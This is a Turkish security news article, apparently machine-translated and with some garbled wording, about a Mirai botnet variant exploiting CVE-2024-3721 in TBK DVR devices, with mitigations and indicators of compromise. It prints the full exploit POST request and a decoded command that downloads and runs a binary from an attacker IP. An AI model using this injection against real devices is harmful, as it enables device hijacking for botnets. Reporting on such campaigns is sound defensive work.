Yeni Mirai Varyant Uzak Kod Yürütme için TBK DVR Kusurdan İstismar


Mirai Botnet aktivitesinin en son dalgası, TBK DVR-4104 ve DVR-4216 cihazlarında kritik bir komut enjeksiyon güvenlik açığı olan CVE-2024-3721’den yararlanan rafine bir saldırı zinciri ile yeniden ortaya çıktı.

Bu kampanya, IoT cihaz kaçırma ve DDOS işlemleri için tasarlanmış değiştirilmiş bir Mirai varyantını dağıtmak için kapatılmamış ürün yazılımından yararlanır.

Sömürü vektörü ve yük teslimatı

Saldırganlar, hazırlanmış HTTP Post talepleri aracılığıyla güvenlik açığından yararlanıyor. /device.rsp uç nokta.

– Reklamcılık –
Google Haberleri

Enjekte edilen komut bir ARM32 ikili indirir ve yürütür:

textPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1

Kod çözülmüş kabuk komut dosyası:

bashcd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk

Bu kolaylaştırılmış yük, özellikle ARM32 tabanlı DVR sistemlerini hedefleyen mimarlık keşiflerini atlar.

Kötü amaçlı yazılım değişiklikleri ve kaçınma taktikleri

Mirai varyantı birkaç yükseltme içerir:

1. RC4 String Şifreleme

  • XOR ile şifreli RC4 anahtarını kullanır: 6e7976666525a97639777d2d7f303177
  • Bir gelenekte depolanan şifre çözülmüş dizeler DataDecrypted Çalışma zamanı erişimi için yapı

2. Anti-analiz kontrolleri

  • Tarama /proc/[PID]/cmdline VMware/QEMU göstergeleri için
  • Sabit kodlanmış dizinlere karşı yürütme yolunu doğrular: metin/dev/shm /tmp /var/run

3. Beyaz liste işlemi
Gibi rakip kötü amaçlı yazılım süreçlerini sonlandırır HajimeAnarchyVe Mozi cihaz kaynaklarını tekelleştirmek için.

Enfeksiyon metrikleri ve azaltma

Telemetri verileri Çin, Hindistan, Mısır, Ukrayna, Rusya, Türkiye ve Brezilya’da konsantre enfeksiyonları ortaya koymaktadır.

50.000’den fazla maruz kalan DVR cihazı küresel olarak savunmasız kalıyor ve saldırganlar Shodan listesindeki hedefleri aktif olarak tarıyor.

Azaltma stratejisiUygulama
Ürün yazılımı yamasıTBK’nın 20240412+ güncellemelerini uygulayın
Ağ segmentasyonuDVR’leri kritik altyapıdan izole
Giriş SterizizasyonuÖzel karakterleri engelleyin mdb/mdc parametreler

Kaspersky ürünleri bu varyant HEUR:Backdoor.Linux.Mirai Ve HEUR:Backdoor.Linux.Gafgyt.

Cihaz sahipleri, ürün yazılımı güncellemelerine öncelik vermeli ve tehlikeye atılan birimler için fabrika sıfırlamalarını düşünmelidir.

Uzlaşma göstergeleri

textIPs: 116.203.104[.]203, 130.61.64[.]122, 161.97.219[.]84  
MD5: 011a406e89e603e93640b10325ebbdc8, 24fd043f9175680d0c061b28a2801dfc  

Bu kampanya, endüstriyel gözetim sistemlerinde miras IoT güvenlik açıklarının kalıcı tehdidinin altını çiziyor.

Mirai Codebase’in sürekli evrimi, tehdit oyuncularının stratejik değişiklikler yoluyla on yıllık kötü amaçlı yazılımları silahlandırma yeteneğini göstermektedir.

Siber güvenlik becerilerinizi yükseltmek için 150’den fazla pratik siber güvenlik kursuyla elmas üyeliği alın – buraya kaydolun



Source link